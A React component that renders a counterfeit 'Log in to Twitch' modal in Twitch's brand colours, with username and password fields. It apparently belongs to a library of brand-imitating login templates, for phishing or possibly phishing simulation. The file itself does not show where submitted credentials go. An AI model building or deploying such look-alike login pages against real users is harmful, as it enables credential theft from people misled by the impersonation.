import React from 'react';
import { LoginTemplate } from '@/lib/loginTemplates';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import { X } from 'lucide-react';

interface TwitchTemplateProps {
  template: LoginTemplate;
  username: string;
  setUsername: (value: string) => void;
  password: string;
  setPassword: (value: string) => void;
  phoneNumber: string;
  setPhoneNumber: (value: string) => void;
  handleSubmit: (e: React.FormEvent) => void;
  isLoading: boolean;
  showPhoneField: boolean;
  navigateToSignup: (id: string) => void;
}

const TwitchTemplate: React.FC<TwitchTemplateProps> = ({
  template,
  username,
  setUsername,
  password,
  setPassword,
  handleSubmit,
  isLoading,
  navigateToSignup,
}) => {
  return (
    <div className="fixed inset-0 bg-black/75 flex items-center justify-center p-6">
      <div className="bg-white rounded-lg max-w-[400px] w-full relative">
        <button 
          onClick={() => navigateToSignup(template.id)}
          className="absolute right-4 top-4 text-gray-500 hover:text-gray-700"
        >
          <X className="h-5 w-5" />
        </button>

        <div className="p-8">
          <h1 className="text-2xl font-semibold mb-6">Log in to Twitch</h1>

          <form onSubmit={handleSubmit} className="space-y-4">
            <div>
              <label className="block text-sm font-medium mb-1">Username</label>
              <Input
                type="text"
                value={username}
                onChange={(e) => setUsername(e.target.value)}
                className="w-full h-10 px-3 rounded border border-gray-300 focus:border-[#9147ff] focus:ring-1 focus:ring-[#9147ff]"
                required
              />
            </div>

            <div>
              <label className="block text-sm font-medium mb-1">Password</label>
              <Input
                type="password"
                value={password}
                onChange={(e) => setPassword(e.target.value)}
                className="w-full h-10 px-3 rounded border border-gray-300 focus:border-[#9147ff] focus:ring-1 focus:ring-[#9147ff]"
                required
              />
            </div>

            <Button
              type="submit"
              className="w-full bg-[#9147ff] hover:bg-[#772ce8] text-white font-semibold py-2 rounded"
              disabled={isLoading}
            >
              {isLoading ? 'Logging in...' : 'Log In'}
            </Button>

            <div className="text-center">
              <a 
                href="#" 
                className="text-[#9147ff] hover:underline text-sm"
                onClick={(e) => e.preventDefault()}
              >
                Trouble logging in?
              </a>
            </div>
          </form>

          <div className="mt-6 text-center">
            <p className="text-sm text-gray-600">
              Don't have an account?{' '}
              <button
                onClick={() => navigateToSignup(template.id)}
                className="text-[#9147ff] hover:underline font-medium"
              >
                Sign up
              </button>
            </p>
          </div>
        </div>
      </div>
    </div>
  );
};

export default TwitchTemplate;